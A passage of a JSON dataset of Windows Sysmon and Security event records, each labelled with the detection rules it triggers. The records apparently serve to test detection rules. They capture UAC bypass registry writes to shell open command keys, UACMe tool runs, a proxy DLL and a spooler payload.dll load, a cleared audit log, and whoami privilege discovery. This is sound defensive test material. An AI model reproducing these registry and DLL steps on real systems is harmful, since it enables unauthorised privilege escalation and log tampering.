UACME-33","TargetObject":"HKU\\S-1-5-21-3461203602-4096304019-2269080069-1000_Classes\\ms-settings\\shell\\open\\command\\DelegateExecute","UtcTime":"2019-08-03 10:14:02.848"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":13,"EventRecordID":5272,"Execution_attributes":{"ProcessID":2780,"ThreadID":3676},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":13,"TimeCreated_attributes":{"SystemTime":"2019-08-03T10:14:02.929209Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["OceanLotus Registry Activity","UAC Bypass Using Registry Shell Open Keys","UAC Bypass via Event 
Viewer"],"event":{"Event":{"EventData":{"Details":"C:\\Windows\\system32\\cmd.exe","EventType":"SetValue","Image":"C:\\Windows\\explorer.exe","ProcessGuid":"747F3D96-5E6A-5D45-0000-001076639D00","ProcessId":4440,"RuleName":"PrivEsc - UAC bypass UACME-33","TargetObject":"HKU\\S-1-5-21-3461203602-4096304019-2269080069-1000_Classes\\ms-settings\\shell\\open\\command\\(Default)","UtcTime":"2019-08-03 10:14:02.848"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":13,"EventRecordID":5273,"Execution_attributes":{"ProcessID":2780,"ThreadID":3676},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":13,"TimeCreated_attributes":{"SystemTime":"2019-08-03T10:14:02.934826Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Bypass UAC via Fodhelper.exe"],"event":{"Event":{"EventData":{"CommandLine":"\"C:\\Windows\\system32\\cmd.exe\" ","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Windows\\system32\\","Description":"Windows Command Processor","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18","Image":"C:\\Windows\\System32\\cmd.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-56A3-5D45-0000-0020B3D31800","LogonId":"0x18d3b3","ParentCommandLine":"\"C:\\Windows\\system32\\fodhelper.exe\" ","ParentImage":"C:\\Windows\\System32\\fodhelper.exe","ParentProcessGuid":"747F3D96-5E6F-5D45-0000-001014CA9D00","ParentProcessId":8180,"ProcessGuid":"747F3D96-5E70-5D45-0000-0010FCDD9D00","ProcessId":3656,"Product":"Microsoft® Windows® Operating 
System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-08-03 10:14:08.401"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":5277,"Execution_attributes":{"ProcessID":2780,"ThreadID":3676},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-08-03T10:14:08.472102Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["UAC Bypass Tool UACMe"],"event":{"Event":{"EventData":{"CommandLine":"\"C:\\Users\\den\\Source\\Repos\\UACME\\Source\\Akagi\\output\\x64\\Release\\Akagi64.exe\" 64","Company":"Integrity Investment LLC","CurrentDirectory":"C:\\Users\\den\\Source\\Repos\\UACME\\Source\\Akagi\\output\\x64\\Release\\","Description":"Pentesting utility","FileVersion":"3.5.1.2010","Hashes":"SHA1=4DFA874CE545B22B3AAFF93BD143C6E463996698,MD5=661D7257C25198B973361117467616BE,SHA256=870691CFC9C98866B2AF2E7E48ED5FD5F1D14CFE0E3E9C630BC472FC0A013D0B,IMPHASH=F31CA5C7DD56008F53D4F3926CF37891","Image":"C:\\Users\\den\\Source\\Repos\\UACME\\Source\\Akagi\\output\\x64\\Release\\Akagi64.exe","IntegrityLevel":"Medium","LogonGuid":"23F38D93-AE9B-5F8E-8CED-170000000000","LogonId":"0x17ed8c","OriginalFileName":"Akagi.exe","ParentCommandLine":"\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" ","ParentImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","ParentProcessGuid":"23F38D93-AF70-5F8E-1E02-000000000C00","ParentProcessId":5592,"ProcessGuid":"23F38D93-CF1E-5F8E-C808-000000000C00","ProcessId":8712,"Product":"UACMe","RuleName":"technique_id=T1059.001,technique_name=PowerShell","TerminalSessionId":2,"User":"DESKTOP-NTSSLJD\\den","UtcTime":"2020-10-20 
11:50:54.800"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"DESKTOP-NTSSLJD","Correlation":null,"EventID":1,"EventRecordID":622,"Execution_attributes":{"ProcessID":7212,"ThreadID":9748},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2020-10-20T11:50:54.810152Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["UAC Bypass Abusing Winsat Path Parsing - File","Suspicious PROCEXP152.sys File Created In TMP","UAC Bypass Using NTFS Reparse Point - File","UAC Bypass Using .NET Code Profiler on MMC","UAC Bypass Using IEInstal - File","UAC Bypass Using MSConfig Token Modification - File"],"event":{"Event":{"EventData":{"CreationUtcTime":"2020-10-20 11:50:55.442","Image":"C:\\Program Files\\Internet Explorer\\IEInstal.exe","ProcessGuid":"23F38D93-CF1F-5F8E-CA08-000000000C00","ProcessId":8736,"RuleName":"-","TargetFilename":"C:\\Users\\den\\AppData\\Local\\Temp\\IDC1.tmp\\[1]consent.exe","UtcTime":"2020-10-20 11:50:55.442"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"DESKTOP-NTSSLJD","Correlation":null,"EventID":11,"EventRecordID":768,"Execution_attributes":{"ProcessID":7212,"ThreadID":9748},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":11,"TimeCreated_attributes":{"SystemTime":"2020-10-20T11:50:55.450643Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["UAC Bypass Abusing Winsat Path Parsing - File","Suspicious PROCEXP152.sys File Created In TMP","UAC Bypass Using NTFS Reparse Point - File","UAC Bypass Using .NET Code Profiler on 
MMC","UAC Bypass Using MSConfig Token Modification - File"],"event":{"Event":{"EventData":{"CreationUtcTime":"2020-10-20 11:50:56.082","Image":"C:\\Windows\\explorer.exe","ProcessGuid":"23F38D93-CF1E-5F8E-C808-000000000C00","ProcessId":8712,"RuleName":"-","TargetFilename":"C:\\Users\\den\\AppData\\Local\\Temp\\[1]consent.exe","UtcTime":"2020-10-20 11:50:56.082"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"DESKTOP-NTSSLJD","Correlation":null,"EventID":11,"EventRecordID":877,"Execution_attributes":{"ProcessID":7212,"ThreadID":9748},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":11,"TimeCreated_attributes":{"SystemTime":"2020-10-20T11:50:56.090214Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Suspicious Driver Load from Temp"],"event":{"Event":{"EventData":{"Company":"Integrity Investment LLC","Description":"UACMe proxy DLL","FileVersion":"3.5.1.2010","Hashes":"SHA1=6298449EB38C20ABFE79C32346258BF4951C1E53,MD5=98F48037163A97285E72A2107F0336CA,SHA256=B26D892448D336EBFAB26F033457D1A2A94E3CD8FBBDA5AE0DBB09E16BE4C84E,IMPHASH=DEA061EF56E13C6D0B065E71A879D9B6","Image":"C:\\Users\\den\\AppData\\Local\\Temp\\IDC1.tmp\\[1]consent.exe","ImageLoaded":"C:\\Users\\den\\AppData\\Local\\Temp\\IDC1.tmp\\[1]consent.exe","OriginalFileName":"Fubuki.dll","ProcessGuid":"23F38D93-CF20-5F8E-CE08-000000000C00","ProcessId":6896,"Product":"UACMe","RuleName":"technique_id=T1073,technique_name=DLL Side-Loading","Signature":"-","SignatureStatus":"Unavailable","Signed":"false","UtcTime":"2020-10-20 
11:50:56.442"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"DESKTOP-NTSSLJD","Correlation":null,"EventID":7,"EventRecordID":964,"Execution_attributes":{"ProcessID":7212,"ThreadID":5064},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":7,"TimeCreated_attributes":{"SystemTime":"2020-10-20T11:50:56.531639Z"},"Version":3}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["UAC Bypass Abusing Winsat Path Parsing - File","Suspicious PROCEXP152.sys File Created In TMP","UAC Bypass Using NTFS Reparse Point - File","UAC Bypass Using .NET Code Profiler on MMC","UAC Bypass Using MSConfig Token Modification - File"],"event":{"Event":{"EventData":{"CreationUtcTime":"2019-08-03 10:51:46.599","Image":"C:\\Windows\\explorer.exe","ProcessGuid":"747F3D96-6742-5D45-0000-00104A66B500","ProcessId":6380,"RuleName":"PrivEsc - UAC Bypass UACME 32","TargetFilename":"C:\\Users\\IEUser\\AppData\\Local\\Temp\\OskSupport.dll","UtcTime":"2019-08-03 10:51:46.599"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":11,"EventRecordID":5305,"Execution_attributes":{"ProcessID":2780,"ThreadID":3676},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":11,"TimeCreated_attributes":{"SystemTime":"2019-08-03T10:51:46.647421Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["OceanLotus Registry Activity","UAC Bypass via Event Viewer"],"event":{"Event":{"EventData":{"Details":"C:\\Windows\\System32\\cmd.exe /c 
notepad.exe","EventType":"SetValue","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","ProcessGuid":"365ABB72-88DC-5CD3-0000-00100DA51A00","ProcessId":2704,"RuleName":"","TargetObject":"HKU\\S-1-5-21-3583694148-1414552638-2922671848-1000_CLASSES\\exefile\\shell\\runas\\command\\IsolatedCommand","UtcTime":"2019-05-09 02:07:51.100"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":13,"EventRecordID":11122,"Execution_attributes":{"ProcessID":1980,"ThreadID":1904},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":13,"TimeCreated_attributes":{"SystemTime":"2019-05-09T02:07:51.116072Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Sdclt Child Processes"],"event":{"Event":{"EventData":{"CommandLine":"\"C:\\Windows\\System32\\cmd.exe\" /c notepad.exe","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Windows\\system32\\","Description":"Windows Command Processor","FileVersion":"6.1.7601.17514 (win7sp1_rtm.101119-1850)","Hashes":"SHA1=EE8CBF12D87C4D388F09B4F69BED2E91682920B5,MD5=AD7B9C14083B52BC532FBA5948342B98,SHA256=17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163","Image":"C:\\Windows\\System32\\cmd.exe","IntegrityLevel":"High","LogonGuid":"365ABB72-863B-5CD3-0000-00204A390100","LogonId":"0x1394a","ParentCommandLine":"?","ParentImage":"C:\\Windows\\System32\\sdclt.exe","ParentProcessGuid":"365ABB72-8B77-5CD3-0000-0010E8FD2900","ParentProcessId":3836,"ProcessGuid":"365ABB72-8B80-5CD3-0000-001065512A00","ProcessId":2264,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"IEWIN7\\IEUser","UtcTime":"2019-05-09 
02:08:00.336"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":1,"EventRecordID":11126,"Execution_attributes":{"ProcessID":1980,"ThreadID":1904},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-05-09T02:08:00.446150Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["(Built-in Logic) - Security audit log was cleared"],"event":{"Event":{"System":{"Channel":"Security","Computer":"alice.insecurebank.local","Correlation":null,"EventID":1102,"EventRecordID":25048,"Execution_attributes":{"ProcessID":748,"ThreadID":6064},"Keywords":"0x4020000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"{fc65ddd8-d6ef-4962-83d5-6e5cfe9ce148}","Name":"Microsoft-Windows-Eventlog"},"Security":null,"Task":104,"TimeCreated_attributes":{"SystemTime":"2019-11-15T08:19:02.298512Z"},"Version":0},"UserData":{"LogFileCleared":{"SubjectDomainName":"insecurebank","SubjectLogonId":"0x1c363a4","SubjectUserName":"bob","SubjectUserSid":"S-1-5-21-1005675359-741490361-30848483-1108"},"LogFileCleared_attributes":{"xmlns":"http://manifests.microsoft.com/win/2004/08/windows/eventlog"}}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Windows Spooler Service Suspicious Binary Load"],"event":{"Event":{"EventData":{"Company":"Microsoft Corporation","Description":"Microsoft Application Virtualization Terminator","FileVersion":"10.0.18362.1 
(WinBuild.160101.0800)","Hashes":"SHA1=D66B48C663F435419913D65E64ED4845CB9BC882,MD5=0419B6B1CCE7FA295A3DC1823E0AD685,SHA256=60BCF03195AE55304114E4AECD800C15C3F15DDDC91B742B4F5A9624494CCA65,IMPHASH=F578F8B5F8EA1AA29D7B69CDB8565B2E","Image":"C:\\Windows\\System32\\spoolsv.exe","ImageLoaded":"C:\\Windows\\System32\\AppVTerminator.dll","ProcessGuid":"6A3C3EF2-8168-5FBF-0000-0010435A0100","ProcessId":2032,"Product":"Microsoft® Windows® Operating System","RuleName":"","Signature":"Microsoft Windows","SignatureStatus":"Valid","Signed":"true","UtcTime":"2020-11-26 10:45:07.672"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"02694w-win10.threebeesco.com","Correlation":null,"EventID":7,"EventRecordID":343368,"Execution_attributes":{"ProcessID":8124,"ThreadID":7540},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":7,"TimeCreated_attributes":{"SystemTime":"2020-11-26T10:45:07.686999Z"},"Version":3}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Windows Spooler Service Suspicious Binary Load"],"event":{"Event":{"EventData":{"Company":"?","Description":"?","FileVersion":"?","Hashes":"SHA1=4B0D3EF916C4D5E4249DC62E0A1A2307C495E3FB,MD5=C957DB23045704214C1A53260598FC85,SHA256=7C1B045BB80761F9E9EDD9B8B7A53D9C374CA0C78926F7AEE1EACCC32EC3B198,IMPHASH=8DEF796746DD54062D5B3186EEF39356","Image":"C:\\Windows\\System32\\spoolsv.exe","ImageLoaded":"C:\\Windows\\System32\\spool\\drivers\\x64\\4\\payload.dll","ProcessGuid":"6A3C3EF2-8739-5FBF-0000-001075514700","ProcessId":8716,"Product":"?","RuleName":"","Signature":"","SignatureStatus":"Unavailable","Signed":"false","UtcTime":"2020-11-26 
10:45:23.976"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"02694w-win10.threebeesco.com","Correlation":null,"EventID":7,"EventRecordID":343371,"Execution_attributes":{"ProcessID":8124,"ThreadID":7540},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":7,"TimeCreated_attributes":{"SystemTime":"2020-11-26T10:45:24.216387Z"},"Version":3}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["OceanLotus Registry Activity","UAC Bypass via Event Viewer"],"event":{"Event":{"EventData":{"Details":"c:\\Windows\\System32\\cmd.exe","EventType":"SetValue","Image":"c:\\python27\\python.exe","ProcessGuid":"365ABB72-7D80-5CD5-0000-00100AD01300","ProcessId":2796,"RuleName":"","TargetObject":"HKU\\S-1-5-21-3583694148-1414552638-2922671848-1000_CLASSES\\mscfile\\shell\\open\\command\\(Default)","UtcTime":"2019-05-10 13:32:48.397"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":13,"EventRecordID":15676,"Execution_attributes":{"ProcessID":1980,"ThreadID":1948},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":13,"TimeCreated_attributes":{"SystemTime":"2019-05-10T13:32:48.412971Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Whoami Execution","Local Accounts Discovery","Run Whoami Showing Privileges"],"event":{"Event":{"EventData":{"CommandLine":"whoami /priv","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Users\\IEUser\\","Description":"whoami - displays logged on user information","FileVersion":"6.1.7600.16385 
(win7_rtm.090713-1255)","Hashes":"SHA1=DC058F52AD8ACBD316827B6DCAC2434AB3CC515C,MD5=0EBF71E33EF09CA65D9683AFA999C473,SHA256=599EFD455AEEEFE2044A9B597061F271595033F5D0DF2C99DFDBCA8394BBCEC3,IMPHASH=C5352B949915AB8CD5E1844790D19274","Image":"C:\\Windows\\System32\\whoami.exe","IntegrityLevel":"High","LogonGuid":"365ABB72-79DF-5CD5-0000-0020F8410100","LogonId":"0x141f8","ParentCommandLine":"\"c:\\Windows\\System32\\cmd.exe\" ","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"365ABB72-7D86-5CD5-0000-0010CC2E1400","ParentProcessId":2076,"ProcessGuid":"365ABB72-7DA9-5CD5-0000-00100ED31400","ProcessId":2524,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"IEWIN7\\IEUser","UtcTime":"2019-05-10 13:33:29.409"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":1,"EventRecordID":15678,"Execution_attributes":{"ProcessID":1980,"ThreadID":1948},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-05-10T13:33:29.424885Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["OceanLotus Registry Activity","UAC Bypass Using Registry Shell Open Keys","UAC Bypass via Event Viewer"],"event":{"Event":{"EventData":{"Details":"c:\\Windows\\SysWOW64\\notepad.exe","EventType":"SetValue","Image":"C:\\Windows\\explorer.exe","ProcessGuid":"747F3D96-9DB0-5D46-0000-00108243AF03","ProcessId":3580,"RuleName":"PrivEsc - UAC bypass UACME-45","TargetObject":"HKU\\S-1-5-21-3461203602-4096304019-2269080069-1000_Classes\\exefile\\shell\\open\\command\\(Default)","UtcTime":"2019-08-04 
08:56:16.635"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":13,"EventRecordID":5664,"Execution_attributes":{"ProcessID":2780,"ThreadID":3676},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":13,"TimeCreated_attributes":{"SystemTime":"2019-08-04T08:56:16.650581Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["UAC Bypass Abusing Winsat Path Parsing - File","UAC Bypass Using NTFS Reparse Point - File","UAC Bypass Using .NET Code Profiler on MMC","UAC Bypass Using MSConfig Token Modification - File"],"event":{"Event":{"EventData":{"CreationUtcTime":"2020-08-25 10:08:05.751","Image":"C:\\Windows\\Explorer.EXE","ProcessGuid":"747F3D96-E2A0-5F44-0000-0010B5BA1B00","ProcessId":4192,"RuleName":"","TargetFilename":"C:\\Users\\user01\\Desktop\\Debug\\ntuser.man","UtcTime":"2020-08-25 10:08:05.751"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":11,"EventRecordID":358988,"Execution_attributes":{"ProcessID":3156,"ThreadID":112},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":11,"TimeCreated_attributes":{"SystemTime":"2020-08-25T10:08:05.763694Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["UAC Bypass Abusing Winsat Path Parsing - File","UAC Bypass Using NTFS Reparse Point - File","UAC Bypass Using .NET Code Profiler on MMC","UAC Bypass Using MSConfig Token Modification - File"],"event":{"Event":{"EventData":{"CreationUtcTime":"2020-08-25 
10:08:05.766","Image":"C:\\Windows\\Explorer.EXE","ProcessGuid":"747F3D96-E2A0-5F44-0000-0010B5BA1B00","ProcessId":4192,"RuleName":"","TargetFilename":"C:\\Users\\user01\\Desktop\\Debug\\ntuser.man.LOG1","UtcTime":"2020-08-25 10:08:05.766"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":11,"EventRecordID":358989,"Execution_attributes":{"ProcessID":3156,"ThreadID":112},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":11,"TimeCreated_attributes":{"SystemTime":"2020-08-25T10:08:05.770148Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["UAC Bypass Abusing Winsat Path Parsing - File","UAC Bypass Using NTFS Reparse Point - File","UAC Bypass Using .NET Code Profiler on MMC","UAC Bypass Using MSConfig Token Modification - File"],"event":{"Event":{"EventData":{"CreationUtcTime":"2020-08-25 10:08:05.766","Image":"C:\\Windows\\Explorer.EXE","ProcessGuid":"747F3D96-E2A0-5F44-0000-0010B5BA1B00","ProcessId":4192,"RuleName":"","TargetFilename":"C:\\Users\\user01\\Desktop\\Debug\\ntuser.man.LOG2","UtcTime":"2020-08-25 10:08:05.766"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":11,"EventRecordID":358990,"Execution_attributes":{"ProcessID":3156,"ThreadID":112},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":11,"TimeCreated_attributes":{"SystemTime":"2020-08-25T10:08:05.772810Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["UAC Bypass Abusing Winsat Path Parsing - File","UAC Bypass Using NTFS Reparse 
Point - File","UAC Bypass Using .NET Code Profiler on MMC","UAC Bypass Using MSConfig Token Modification - File"],"event":{"Event":{"EventData":{"CreationUtcTime":"2020-08-25 10:08:05.766","Image":"C:\\Windows\\Explorer.EXE","ProcessGuid":"747F3D96-E2A0-5F44-0000-0010B5BA1B00","ProcessId":4192,"RuleName":"","TargetFilename":"C:\\Users\\user01\\Desktop\\Debug\\ntuser.man{f9a54a1d-9fa5-11ea-ac3f-00155d0a720b}.TM.blf","UtcTime":"2020-08-25 10:08:05.766"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":11,"EventRecordID":358991,"Execution_attributes":{"ProcessID":3156,"ThreadID":112},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":11,"TimeCreated_attributes":{"SystemTime":"2020-08-25T10:08:05.776409Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["UAC Bypass Abusing Winsat Path Parsing - File","UAC Bypass Using NTFS Reparse Point - File","UAC Bypass Using .NET Code Profiler on MMC","UAC Bypass Using MSConfig Token Modification - File"],"event":{"Event":{"EventData":{"CreationUtcTime":"2020-08-25 10:08:05.766","Image":"C:\\Windows\\Explorer.EXE","ProcessGuid":"747F3D96-E2A0-5F44-0000-0010B5BA1B00","ProcessId":4192,"RuleName":"","TargetFilename":"C:\\Users\\user01\\Desktop\\Debug\\ntuser.man{f9a54a1d-9fa5-11ea-ac3f-00155d0a720b}.TMContainer00000000000000000001.regtrans-ms","UtcTime":"2020-08-25 
10:08:05.766"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":11,"EventRecordID":358992,"Execution_attributes":{"ProcessID":3156,"ThreadID":112},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":11,"TimeCreated_attributes":{"SystemTime":"2020-08-25T10:08:05.780448Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["UAC Bypass Abusing Winsat Path Parsing - File","UAC Bypass Using NTFS Reparse Point - File","UAC Bypass Using .NET Code Profiler on MMC","UAC Bypass Using MSConfig Token Modification - File"],"event":{"Event":{"EventData":{"CreationUtcTime":"2020-08-25 10:08:05.782","Image":"C:\\Windows\\Explorer.EXE","ProcessGuid":"747F3D96-E2A0-5F44-0000-0010B5BA1B00","ProcessId":4192,"RuleName":"","TargetFilename":"C:\\Users\\user01\\Desktop\\Debug\\ntuser.man{f9a54a1d-9fa5-11ea-ac3f-00155d0a720b}.TMContainer00000000000000000002.regtrans-ms","UtcTime":"2020-08-25 10:08:05.782"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":11,"EventRecordID":358993,"Execution_attributes":{"ProcessID":3156,"ThreadID":112},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":11,"TimeCreated_attributes":{"SystemTime":"2020-08-25T10:08:05.787947Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["UAC Bypass Abusing Winsat Path Parsing - File","UAC Bypass 